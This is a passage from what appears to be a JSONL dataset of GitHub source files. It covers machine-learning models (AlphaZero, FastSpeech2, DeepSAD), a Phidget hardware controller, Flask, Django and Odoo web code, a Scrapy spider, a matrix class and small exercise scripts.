)\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(128, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 1, kernel_size=3, padding=1),\n )\n\n self.loss_value = nn.MSELoss()\n self.optimizer = optim.Adam(self.parameters(), lr=config.lr, weight_decay=config.l2_reg)\n\n def forward(self, 
x, label_value=None, label_policy=None):\n s = self.shared(x)\n v_, p_ = self.value_head(s), self.policy_head(s)\n v = F.max_pool2d(v_, kernel_size=v_.size()[2:]).squeeze(-1).squeeze(-1)\n value = self.value_fc(v)\n\n batch, _, board_dim1, board_dim2 = p_.shape\n policy = p_.reshape(batch, -1).log_softmax(dim=-1).reshape(batch, board_dim1, board_dim2)\n \n if label_value is None:\n return 0, dict(value=value, policy=policy.exp())\n\n loss_value = self.loss_value(value.squeeze(dim=1), label_value)\n log_label = label_policy.log()\n log_label[torch.isinf(log_label)] = 0\n\n loss_policy = (label_policy * (log_label - policy)).sum(dim=(1, 2)).mean()\n loss = loss_value + loss_policy\n entropy = -(policy * policy.exp()).sum(dim=(1, 2)).mean()\n return loss, dict(loss=loss, loss_value=loss_value, loss_policy=loss_policy, entropy=entropy)","repo_name":"ZhongxiaYan/alphazero_gomoku","sub_path":"alphazero/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"1117083553","text":"import sys\nimport time \nfrom Phidget22.Devices.VoltageOutput import *\nfrom Phidget22.PhidgetException import *\nfrom Phidget22.Phidget import *\nfrom Phidget22.Net import *\n\ntry:\n from PhidgetHelperFunctions import *\nexcept ImportError:\n sys.stderr.write(\"\\nCould not find PhidgetHelperFunctions. Either add PhdiegtHelperFunctions.py to your project folder \"\n \"or remove the import from your project.\")\n sys.exit()\n\nch0 = None\nch1 = None\n\n'''\n* Displays info about the attached Phidget channel. \n* Fired when a Phidget channel with onAttachHandler registered attaches\n*\n* @param self The Phidget channel that fired the attach event\n'''\ndef onAttachHandler(self):\n \n ph = self\n\n try:\n #If you are unsure how to use more than one Phidget channel with this event, we recommend going to\n #www.phidgets.com/docs/Using_Multiple_Phidgets for information\n \n print(\"\\nAttach Event:\")\n \n \"\"\"\n * Get device information and display it.\n \"\"\"\n channelClassName = ph.getChannelClassName()\n serialNumber = ph.getDeviceSerialNumber()\n channel = ph.getChannel()\n if(ph.getDeviceClass() == DeviceClass.PHIDCLASS_VINT):\n hubPort = ph.getHubPort()\n print(\"\\n -> Channel Class: \" + channelClassName + \"\\n -> Serial Number: \" + str(serialNumber) +\n \"\\n -> Hub Port: \" + str(hubPort) + \"\\n -> Channel: \" + str(channel) + \"\\n\")\n else:\n print(\"\\n -> Channel Class: \" + channelClassName + \"\\n -> Serial Number: \" + str(serialNumber) +\n \"\\n -> Channel: \" + str(channel) + \"\\n\")\n \n except PhidgetException as e:\n print(\"\\nError in Attach Event:\")\n DisplayError(e)\n traceback.print_exc()\n return\n\n\"\"\"\n* Displays info about the detached Phidget channel.\n* Fired when a Phidget channel with onDetachHandler registered detaches\n*\n* @param self The Phidget channel that fired the attach event\n\"\"\"\ndef onDetachHandler(self):\n\n ph = self\n\n try:\n #If you are unsure how to use more than one Phidget channel with this event, we recommend going to\n #www.phidgets.com/docs/Using_Multiple_Phidgets for information\n \n print(\"\\nDetach Event:\")\n \n \"\"\"\n * Get device information and display it.\n \"\"\"\n channelClassName = ph.getChannelClassName()\n serialNumber = ph.getDeviceSerialNumber()\n channel = ph.getChannel()\n if(ph.getDeviceClass() == DeviceClass.PHIDCLASS_VINT):\n hubPort = ph.getHubPort()\n print(\"\\n -> Channel Class: \" + 
channelClassName + \"\\n -> Serial Number: \" + str(serialNumber) +\n \"\\n -> Hub Port: \" + str(hubPort) + \"\\n -> Channel: \" + str(channel) + \"\\n\")\n else:\n print(\"\\n -> Channel Class: \" + channelClassName + \"\\n -> Serial Number: \" + str(serialNumber) +\n \"\\n -> Channel: \" + str(channel) + \"\\n\")\n \n except PhidgetException as e:\n print(\"\\nError in Detach Event:\")\n DisplayError(e)\n traceback.print_exc()\n return\n\n\"\"\"\n* Writes Phidget error info to stderr.\n* Fired when a Phidget channel with onErrorHandler registered encounters an error in the library\n*\n* @param self The Phidget channel that fired the attach event\n* @param errorCode the code associated with the error of enum type ph.ErrorEventCode\n* @param errorString string containing the description of the error fired\n\"\"\"\ndef onErrorHandler(self, errorCode, errorString):\n\n sys.stderr.write(\"[Phidget Error Event] -> \" + errorString + \" (\" + str(errorCode) + \")\\n\")\n \n\"\"\"\n* Creates, configures, and opens a VoltageOutput channel.\n* Provides interface for controlling Voltage of the VoltageOutput.\n* Closes out VoltageOutput channel\n*\n* @return 0 if the program exits successfully, 1 if it exits with errors.\n\"\"\"\ndef initialise():\n try:\n \"\"\"\n * Allocate a new Phidget Channel object\n \"\"\"\n global ch0\n global ch1\n try:\n ch0 = VoltageOutput()\n ch1 = VoltageOutput()\n except PhidgetException as e:\n sys.stderr.write(\"Runtime Error -> Creating VoltageOutput: \\n \")\n DisplayError(e)\n raise\n except RuntimeError as e:\n sys.stderr.write(\"Runtime Error -> Creating VoltageOutput: \\n \" + e)\n raise\n\n \"\"\"\n * Set matching parameters to specify which channel to open\n \"\"\"\n #You may remove this line and hard-code the addressing parameters to fit your application\n #channelInfo = AskForDeviceParameters(ch)\n \n ch0.setDeviceSerialNumber(493848)\n ch1.setDeviceSerialNumber(493848)\n ch0.setHubPort(0)\n ch1.setHubPort(0)\n ch0.setIsHubPortDevice(0)\n ch1.setIsHubPortDevice(0)\n ch0.setChannel(0) \n ch1.setChannel(1)\n \n \"\"\"\n * Add event handlers before calling open so that no events are missed.\n \"\"\"\n print(\"\\n--------------------------------------\")\n print(\"\\nSetting OnAttachHandler...\")\n ch0.setOnAttachHandler(onAttachHandler)\n ch1.setOnAttachHandler(onAttachHandler)\n \n print(\"Setting OnDetachHandler...\")\n ch0.setOnDetachHandler(onDetachHandler)\n ch1.setOnDetachHandler(onDetachHandler)\n \n print(\"Setting OnErrorHandler...\")\n ch0.setOnErrorHandler(onErrorHandler)\n ch1.setOnErrorHandler(onErrorHandler)\n \n \"\"\"\n * Open the channel with a timeout\n \"\"\"\n print(\"\\nOpening and Waiting for Attachment...\")\n \n try:\n ch0.openWaitForAttachment(5000)\n except PhidgetException as e:\n PrintOpenErrorMessage(e, ch0)\n raise EndProgramSignal(\"Program Terminated: Open Failed\")\n\n try:\n ch1.openWaitForAttachment(5000)\n except PhidgetException as e:\n PrintOpenErrorMessage(e, ch1)\n raise EndProgramSignal(\"Program Terminated: Open Failed\")\n \n except PhidgetException as e:\n sys.stderr.write(\"\\nExiting with error(s)...\")\n DisplayError(e)\n traceback.print_exc()\n print(\"Cleaning up...\")\n ch0.close()\n ch1.close()\n return 1\n \n except EndProgramSignal as e:\n print(e)\n print(\"Cleaning up...\")\n ch.close()\n return 1\n\ndef setVoltage(voltage, channel):\n try:\n # print(\"--------------------\\n\"\n # \"\\n | VoltageOutput voltage can be controlled by setting its Target Voltage.\\n\"\n # \" | The target voltage can be a 
number between MinVoltage and MaxVoltage.\\n\"\n # \"\\nInput a desired voltage and press ENTER\\n\"\n # \"Input Q and press ENTER to quit\\n\")\n try:\n voltage = float(voltage)\n except ValueError as e:\n print(\"Input must be a number, or Q to quit.\")\n return 0\n\n if (voltage > ch0.getMaxVoltage() or voltage < ch0.getMinVoltage()):\n print(\"Voltage must be between %.2f and %.2f\\n\" % (ch0.getMinVoltage(), ch0.getMaxVoltage()))\n return 0\n\n print(\"Setting VoltageOutput Voltage to \" + str(voltage))\n if channel == 0:\n ch0.setVoltage(voltage)\n elif channel == 1:\n ch1.setVoltage(voltage)\n\n except PhidgetException as e:\n sys.stderr.write(\"\\nExiting with error(s)...\")\n DisplayError(e)\n traceback.print_exc()\n print(\"Cleaning up...\")\n ch.close()\n return 1\n except EndProgramSignal as e:\n print(e)\n print(\"Cleaning up...\")\n ch.close()\n return 1\n\n'''\n* Perform clean up and exit\n'''\ndef close():\n global ch0\n global ch1\n print(\"Cleaning up...\")\n ch0.close()\n ch1.close()\n print(\"\\nExiting...\")\n return 0\n\n#main()\n\n","repo_name":"singhikra/LEGO_Kibble_Balance","sub_path":"Phidget.py","file_name":"Phidget.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31203065824","text":"import numpy as np\nimport torch\nfrom torch import nn\n\nfrom fastspeech2.VarianceAdaptorBlock.utilities import Transpose\n\n\nclass DurationPredictor(nn.Module):\n \"\"\" Duration Predictor \"\"\"\n\n def __init__(self):\n super(DurationPredictor, self).__init__()\n\n self.input_size = 256\n self.filter_size = 256\n self.kernel = 3\n self.conv_output_size = 256\n self.dropout = 0.1\n\n self.conv_net = nn.Sequential(\n Transpose(-1, -2),\n nn.Conv1d(\n self.input_size, self.filter_size,\n kernel_size=self.kernel, padding=1\n ),\n Transpose(-1, -2),\n nn.LayerNorm(self.filter_size),\n nn.ReLU(),\n nn.Dropout(self.dropout),\n Transpose(-1, -2),\n nn.Conv1d(\n self.filter_size, self.filter_size,\n kernel_size=self.kernel, padding=1\n ),\n Transpose(-1, -2),\n nn.LayerNorm(self.filter_size),\n nn.ReLU(),\n nn.Dropout(self.dropout)\n )\n\n self.linear_layer = nn.Linear(self.conv_output_size, 1)\n self.relu = nn.ReLU()\n\n def forward(self, encoder_output):\n encoder_output = self.conv_net(encoder_output)\n\n out = self.linear_layer(encoder_output)\n out = self.relu(out)\n out = out.squeeze()\n return out","repo_name":"leksious/TTS","sub_path":"fastspeech2/VarianceAdaptorBlock/DurationPredictor.py","file_name":"DurationPredictor.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17513870946","text":"import threading\n\nfrom flask import Flask\nfrom flask import request\nfrom flask_cors import CORS\n\nfrom flask_mail import Mail, Message\n\n### Import all blueprints ###\nfrom mail_server import app as mail_app\nfrom auth import auth \nfrom vip import vip\nfrom vip import UPLOAD_FOLDER\nfrom config import system_mail_config as mail_conf\nfrom config import ssl_config\n\nmail = Mail()\napp = Flask(__name__)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = mail_conf['email_address']\napp.config['MAIL_PASSWORD'] = mail_conf['password']\napp.config['MAIL_USE_TLS'] = False \napp.config['MAIL_USE_SSL'] = True\nmail.init_app(app)\n\napp.register_blueprint(auth, url_prefix='/auth')\napp.register_blueprint(vip, 
url_prefix='/vip')\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nCORS(app)\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n return 'Hello world'\n\n@app.route('/send_mail', methods=['POST'])\ndef send_mail():\n if(request.method == 'POST'):\n message = request.form['message']\n sender = request.form['sender']\n recipient = request.form['recipient']\n\n msg = Message('[Virtual Interview System] Password confirmation',\n sender = sender,\n recipients=[recipient])\n\n msg.body = message\n\n mail.send(msg)\n\n return 'success'\n\ndef runMailServer():\n mail_app.run(host='0.0.0.0', port=8081) \n\nif __name__ == '__main__':\n mail_thread = threading.Thread(target=runMailServer, args=())\n mail_thread.daemon = True \n mail_thread.start()\n app.run(host='0.0.0.0', port=8080, ssl_context=(ssl_config['cert'], ssl_config['key']))\n","repo_name":"hieubkvn123/VirtualInterviewPlatform","sub_path":"api/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9426539285","text":"from typing import List\n\nimport jiwer\nimport jiwer.transforms as tr\nfrom packaging import version\n\nimport platform\nif version.parse(platform.python_version()) < version.parse(\"3.8\"):\n import importlib_metadata\nelse:\n import importlib.metadata as importlib_metadata\n\n\nSENTENCE_DELIMITER = \"\"\n\n\nif version.parse(importlib_metadata.version(\"jiwer\")) < version.parse(\"2.3.0\"):\n class SentencesToListOfCharacters(tr.AbstractTransform):\n def __init__(self, sentence_delimiter: str = \" \"):\n self.sentence_delimiter = sentence_delimiter\n\n def process_string(self, s: str):\n return list(s)\n\n def process_list(self, inp: List[str]):\n chars = []\n for sent_idx, sentence in enumerate(inp):\n chars.extend(self.process_string(sentence))\n if self.sentence_delimiter is not None and self.sentence_delimiter != \"\" and sent_idx < len(inp) - 1:\n chars.append(self.sentence_delimiter)\n return chars\n\n cer_transform = tr.Compose(\n [tr.RemoveMultipleSpaces(), tr.Strip(), SentencesToListOfCharacters(SENTENCE_DELIMITER)]\n )\nelse:\n cer_transform = tr.Compose(\n [\n tr.RemoveMultipleSpaces(),\n tr.Strip(),\n tr.ReduceToSingleSentence(SENTENCE_DELIMITER),\n tr.ReduceToListOfListOfChars(),\n ]\n )\n\nclass CER:\n def compute(self, predictions, references, concatenate_texts=False):\n if concatenate_texts:\n return jiwer.compute_measures(\n references,\n predictions,\n truth_transform=cer_transform,\n hypothesis_transform=cer_transform,\n )[\"wer\"]\n\n incorrect = 0\n total = 0\n for prediction, reference in zip(predictions, references):\n measures = jiwer.compute_measures(\n reference,\n prediction,\n truth_transform=cer_transform,\n hypothesis_transform=cer_transform,\n )\n incorrect += measures[\"substitutions\"] + measures[\"deletions\"] + measures[\"insertions\"]\n total += measures[\"substitutions\"] + measures[\"deletions\"] + measures[\"hits\"]\n\n return incorrect / total\n","repo_name":"juchengquan/project_eva","sub_path":"src/metrics/cer.py","file_name":"cer.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32921424301","text":"from odoo import fields, models\n\n\nclass SourceFundMonitorReport(models.Model):\n _inherit = \"source.fund.monitor.report\"\n\n date_from = fields.Date()\n date_to = fields.Date()\n active = fields.Boolean()\n budget_period_id = fields.Many2one(\n 
comodel_name=\"budget.period\",\n index=True,\n )\n\n @property\n def _table_query(self):\n \"\"\"Overwrite query table on source of fund monitoring\"\"\"\n return \"\"\"\n select a.*, d.id as date_range_id, p.id as budget_period_id\n from ({}) a\n left outer join date_range d\n on a.date_to between d.date_start and d.date_end\n left outer join budget_period p\n on a.date_to between p.bm_date_from and p.bm_date_to\n {}\n \"\"\".format(\n self._get_sql(), self._get_where_sql()\n )\n\n # Budget\n def _select_budget(self):\n select_budget_query = super()._select_budget()\n # Replace null analytic and amount\n budget_query = (\n select_budget_query[0]\n .replace(\"1000000000 + sf.id as id\", \"1000000000 + al.id as id\")\n .replace(\n \"null::integer as analytic_account_id,\",\n \"aa.id as analytic_account_id,\",\n )\n .replace(\"null::integer as amount\", \"al.released_amount as amount\")\n )\n select_budget_query[0] = budget_query\n select_budget_query[\n 10\n ] = \"\"\"\n al.date_from as date_from,\n al.date_to as date_to,\n bc.active as active\n \"\"\"\n return select_budget_query\n\n def _from_budget(self):\n from_budget_query = super()._from_budget()\n from_budget_query = \"\\n\".join(\n [\n from_budget_query,\n \"\"\"\n join budget_allocation_line al on al.fund_id = sf.id\n join account_analytic_account aa\n on aa.id = al.analytic_account_id\n join budget_control bc\n on bc.analytic_account_id = aa.id\n left join mis_budget_item mbi\n on mbi.budget_control_id = bc.id\n \"\"\",\n ]\n )\n return from_budget_query\n\n # All consumed\n def _select_statement(self, amount_type):\n select_statement = super()._select_statement(amount_type)\n select_statement[\n 10\n ] = \"\"\"\n aa.bm_date_from as date_from,\n aa.bm_date_to as date_to,\n 1::boolean as active\n \"\"\"\n return select_statement\n\n def _from_statement(self, amount_type):\n from_statment = super()._from_statement(amount_type)\n from_statment = \"\\n\".join(\n [\n from_statment,\n \"\"\"\n join account_analytic_account aa\n on aa.id = a.analytic_account_id\n \"\"\",\n ]\n )\n return from_statment\n\n def _get_where_sql(self):\n return \"where d.type_id = p.plan_date_range_type_id\"\n","repo_name":"ecosoft-odoo/budgeting","sub_path":"budget_allocation_fund/report/source_fund_monitor_report.py","file_name":"source_fund_monitor_report.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74852963442","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.urls import reverse\n\nfrom .models import Course\nfrom .forms import CourseForm\nfrom first_django.utils import process_modal_vars, process_form_vars\n\n\n# Create your views here.\n\n\ndef course_list_view(request):\n course_queryset = Course.objects.all()\n context = {\n \"courses\": course_queryset\n }\n return render(request, \"course/list.html\", context=context)\n\n\ndef course_detail_view(request, id):\n obj = Course.objects.get(id=id)\n context = {\n \"object\": obj,\n \"modal\": process_modal_vars(\n \"Delete Confirmation\", \"Do you want to delete this content?\", \"Yes\", reverse(\"courses:delete\",\n kwargs={\"id\": id})\n )\n }\n return render(request, \"course/detail.html\", context=context)\n\n\n@login_required\ndef course_create_view(request):\n form = CourseForm(request.POST or None)\n context = {\n \"form\": form,\n \"generic_form\": process_form_vars(\"Create\", 
reverse(\"courses:list\"))\n }\n if form.is_valid():\n obj = form.save()\n context[\"obj\"] = obj\n created = False\n if obj is not None:\n created = True\n context[\"created\"] = created\n\n return render(request, \"course/create.html\", context=context)\n\n\n@login_required\ndef course_update_view(request, id):\n course_obj = get_object_or_404(Course, id=id)\n context = {\n \"generic_form\": process_form_vars(\"Update\", reverse(\"courses:list\"), reverse(\"courses:edit\", kwargs={\"id\": id}))\n }\n if request.method == 'POST':\n form = CourseForm(request.POST)\n if form.is_valid():\n course_obj.course = form.cleaned_data['course']\n course_obj.subject = form.cleaned_data['subject']\n course_obj.location = form.cleaned_data['location']\n course_obj.instructor = form.cleaned_data['instructor']\n course_obj.grade = form.cleaned_data['grade']\n course_obj.semester = form.cleaned_data['semester']\n course_obj.year = form.cleaned_data['year']\n course_obj.credit = form.cleaned_data['credit']\n course_obj.save()\n return redirect(reverse(\"courses:list\"))\n\n else:\n form = CourseForm(data={\n 'course': course_obj.course,\n 'subject': course_obj.subject,\n 'location': course_obj.location or None,\n 'instructor': course_obj.instructor or None,\n 'grade': course_obj.grade,\n 'semester': course_obj.semester or None,\n 'year': course_obj.year or None,\n 'credit': course_obj.credit,\n })\n context[\"form\"] = form\n return render(request, \"course/update.html\", context=context)\n\n\n@login_required\ndef course_delete_view(request, id):\n if request.method == \"POST\":\n course_obj = get_object_or_404(Course, id=id)\n course_obj.delete()\n return redirect(reverse(\"courses:list\"))","repo_name":"orngylw/first-django","sub_path":"course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21677713876","text":"# Simple mad libs generator in python \n\nimport os\n\nnoun1 = input(\"Enter a noun: \")\nnoun2 = input(\"Enter another noun: \")\nadjective1 = input(\"Enter an adjective: \")\nadjective2 = input(\"Enter another adjective: \")\n\nos.system(\"cls\") # Clearing the screen \n\nmessage = f\"roses are {adjective1},\\n{noun1} are blue,\\n{noun2} are {adjective2},\\nAnd so are you!\"\nprint(message)\n","repo_name":"SuyogPrasai/mad_libs_generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7475748587","text":"from typing import List\n\n# Runtime: 176 ms, faster than 39.31% of Python3\n# Memory Usage: 14.8 MB, less than 9.00%\nclass Solution:\n def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:\n max_flower_add = 0\n\n def can_planted(index):\n # global flower\n if flowerbed[index] == 0 and (index - 1 < 0 or flowerbed[index-1] == 0) and (index + 1 == len(flowerbed) or flowerbed[index+1] == 0):\n return True\n return False\n\n for i, cell in enumerate(flowerbed):\n if can_planted(i):\n flowerbed[i] = 1\n max_flower_add += 1\n i += 1\n\n return n <= max_flower_add\n\n\n# better python:\n def canPlaceFlowers2(self, flowerbed: List[int], n: int) -> bool:\n plant = 0\n canPlant = True\n for i in range(len(flowerbed)):\n if flowerbed[i]:\n canPlant = False\n else:\n if canPlant:\n if i + 1 >= len(flowerbed) or flowerbed[i + 1] == 0:\n plant += 1\n canPlant = False\n else:\n canPlant = True\n if plant > n: return 
True\n return plant >= n","repo_name":"hoanghailethe/Pythonhead","sub_path":"Leetcode/11.14.TestOn/_605_CanPlaceFlower.py","file_name":"_605_CanPlaceFlower.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7585570604","text":"#!/usr/bin/env python\n# coding: utf-8\n#声明必须放在前两行,# coding=\n\n'''\n\n@author: \n\n@license: \n\n@contact: \n\n@software: Test\n\n@file: 163Spider.py\n\n@time: 2017/12/3 下午6:47\n\n@desc:\n'''\nimport scrapy\nfrom mySpider.items import MyspiderItem\nclass my163Spider(scrapy.Spider):\n name='163spider'#执行的时候用到 scrapy crawl name\n allowed_domains=['http://www.163.com']\n start_urls=['http://money.163.com/special/pinglun/']\n def parse(self,response):#名字不能乱改\n with open('pinglun.html','w') as f:\n f.write(response.body)#这是scrapy的用法,urllib2是text或者content.\n news_list=response.xpath('//div[@class=\"item_top\"]')\n newsItem=[]\n for each in news_list:\n item=MyspiderItem()\n title=each.xpath('./h2/a/text()').extract()\n time=each.xpath('./p/span/text()').extract()\n abstract=each.xpath('./p/text()').extract()\n item['title']=title[0]\n item['time']=time[0]\n item['abstract']=abstract[0]\n yield item#拿到一个数据,就交给管道文件处理。不用把他放到一个list里面集中处理。yield还可以处理请求\n\n\n","repo_name":"wiky2/mytestproject","sub_path":"testforothers/Scrapy/scrapytest1/mySpider/mySpider/spiders/163Spider.py","file_name":"163Spider.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"74174594163","text":"import math\nimport random\n\n#sigmoid function\ndef sigmoid(x):\n return 1/(1+math.exp( -x ))\n\ndef dsigmoid(y):\n return y * (1 - y)\nclass Matrix:\n def __init__(self, rows, cols,add):\n self.rows = rows\n self.cols = cols\n \n self.matrix = []\n print()\n #z = input()\n for i in range(rows):\n ea_row = []\n for j in range(cols):\n # if (add==\"\"):\n # ea_row.append(z)\n # else:\n # ea_row.append(int(z))\n \n ea_row.append(0) \n self.matrix.append(ea_row)\n \n #draw the matrix\n def __repr__(self):\n outStr = \"\"\n for i in range(self.rows):\n outStr += 'Row %s = %s\\n' % (i+1, self.matrix[i])\n return outStr\n \n #giving the random numbers for matrix\n def randomise(self):\n for i in range(self.rows):\n for j in range(self.cols):\n self.matrix[i][j] = random.random()\n return self\n \n #set element of the matrix\n def setitem(self, col, row, v):\n self.matrix[col-1][row-1] = v\n \n \n #get element of the matrix\n def getitem(self, col, row):\n return self.matrix[col-1][row-1]\n \n\n #add number to any element of the matrix\n def addition(self, col, row,w):\n a = self.matrix[col-1][row-1]\n b = float(w) + float(a)\n return b\n \n #add number to any element of the matrix\n def pluse(self,w):\n #a = self.matrix[][row-1]\n result = Matrix(self.rows,self.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = float(w) + float(a)\n result.matrix[i][j] = b\n return result\n \n #multiply number to any element of the matrix\n def multiplication(self,w):\n #a = self.matrix[][row-1]\n result = Matrix(self.rows,self.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = float(w) * float(a)\n result.matrix[i][j] = b\n return result\n \n @staticmethod\n def sub(self,other):\n result = Matrix(self.rows,other.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = other.matrix[i][j]\n c = float(a) 
- float(b)\n result.matrix[i][j] = c\n return result\n \n #add a number to matrix elements\n def add(self,other):\n result = Matrix(self.rows,other.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = other.matrix[i][j]\n c = float(a)+float(b)\n result.matrix[i][j] = c\n return result\n\n #hadamard multiplication of matrix\n def mul(self,other):\n result = Matrix(self.rows,other.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = other.matrix[i][j]\n c = float(a) * float(b)\n result.matrix[i][j] = c\n return result\n \n @staticmethod\n def map(mat,func):\n result = Matrix(self.rows,other.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n val = mat.matrix[i][j]\n result.matrix[i][j] = func(val)\n \n \n \n #converting input matrix to the form of vector\n @staticmethod\n def fromArray(array):\n m = Matrix(len(array),1,0)\n for i in range(len(array)):\n m.matrix[i][0] = array[i]\n return m\n \n \n def toarray(self):\n arr = []\n #a = self.rows\n #b = self.cols\n #print(a)\n #print(b)\n for i in range(self.rows):\n for j in range(self.cols):\n arr.append(self.matrix[i][j])\n #print(arr)\n return arr\n \n #matrix multiplication (dot product)\n @staticmethod\n def matrix_multiplication(self,other):\n z = self.rows\n q = self.cols\n w = other.rows\n y = other.cols\n \n if q != w:\n print(\"column of 1st matrix must match rows of 2nd matrix\")\n else:\n result = Matrix(self.rows,other.cols,0)\n for i in range(z):\n for j in range(y):\n s = 0\n e = 0\n for k in range(w):\n a = self.matrix[i][k]\n b = other.matrix[k][j] \n\n c = float(a) * float(b)\n #print(c)\n s += c\n \n result.matrix[i][j] = s\n return result\n \n #make the transpose of the inpute matrix\n #@staticmethod\n def transpose(self):\n result = Matrix(self.cols,self.rows,0)\n for i in range(self.rows):\n for j in range(self.cols):\n #print(self.matrix[i][j])\n result.matrix[j][i] = self.matrix[i][j]\n return result\n \n #mapping the sigmoid function \n def map(self,func): \n for i in range(self.rows):\n for j in range(self.cols):\n val = self.matrix[i][j]\n self.matrix[i][j] = func(val)\n\n#a = Matrix(3,4,0)\n#b = Matrix(4,5,0)\n#print(a)\n#print(b)\n\n#Matrix.mult(a,b)\n\n#z = b.randomise()\n#print(z)\n\n#a.setitem(2,3,5.75)\n#print(a)\n#b.setitem(2,4,2)\n#print(b)\n#a.setitem(2,2,19)\n#print(a)\n\n#a = a.transpose()\n#print(a)\n\n#print(\"items of a :\")\n#print (a.getitem(2,2))\n#print(\"items of b :\")\n#print (b.getitem(2,2))\n\n#print(b.add_to_single_element(2,4,5))\n\n#c = Matrix(3,1,0)\n#d = Matrix(3,1,0)\n#print(c)\n#print(d)\n#z = Matrix.sub(c,d)\n#print(z)\n\n#z = a.pluse(1)\n#print(z)\n\n#y = a.add(b)\n#print(y)\n\n#c = a.multiplication(2)\n#print(c)\n#y = a.mul(b)\n#print(y)\n\n#array =[1,2,3]\n#print(array)\n#Matrix.fromArray(array)\n\n#Matrix.matrix_multiplication(a, b)\n#print(z)\n\n#b.map(sigmoid)\n#print(b)\n","repo_name":"desaiankit911/neural-network","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32785756917","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\n\n\n# Acknowledgements: https://github.com/wohlert/semi-supervised-pytorch\nclass Stochastic(nn.Module):\n \"\"\"\n Base stochastic layer that uses the reparametrization trick (Kingma and Welling, 2013) to draw a sample from a\n distribution 
parametrized by mu and log_var.\n \"\"\"\n\n def __init__(self):\n super(Stochastic, self).__init__()\n\n def reparametrize(self, mu, log_var):\n epsilon = Variable(torch.randn(mu.size()), requires_grad=False)\n\n if mu.is_cuda:\n epsilon = epsilon.to(mu.device)\n\n # log_std = 0.5 * log_var\n # std = exp(log_std)\n std = log_var.mul(0.5).exp_()\n\n # z = std * epsilon + mu\n z = mu.addcmul(std, epsilon)\n\n return z\n\n def forward(self, x):\n raise NotImplementedError\n\n\nclass GaussianSample(Stochastic):\n \"\"\"\n Layer that represents a sample from a Gaussian distribution.\n \"\"\"\n\n def __init__(self, in_features, out_features):\n super(GaussianSample, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n\n self.mu = nn.Linear(in_features, out_features)\n self.log_var = nn.Linear(in_features, out_features)\n\n def forward(self, x):\n mu = self.mu(x)\n log_var = F.softplus(self.log_var(x))\n return self.reparametrize(mu, log_var), mu, log_var\n","repo_name":"Minqi824/ADBench","sub_path":"adbench/baseline/DeepSAD/src/networks/layers/stochastic.py","file_name":"stochastic.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"75"} +{"seq_id":"1125691554","text":"import numpy as np\n\n\nclass RangeDict(dict):\n \"\"\"\n Custom dictionary class to use key ranges in the form of key[0] < item < key[1] as keys.\n \"\"\"\n\n def __getitem__(self, item):\n if not isinstance(item, tuple):\n for key in self:\n if key[0] < item < key[1]:\n return self[key]\n else:\n return super().__getitem__(item)\n\nif __name__ == '__main__':\n a = RangeDict({(0.1, 1): \"Test\"})\n print(a[0.5])","repo_name":"lkno0705/IndustrialApplicationsofAI","sub_path":"tertiary-sector/practical-finance/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"72109940083","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom .search import 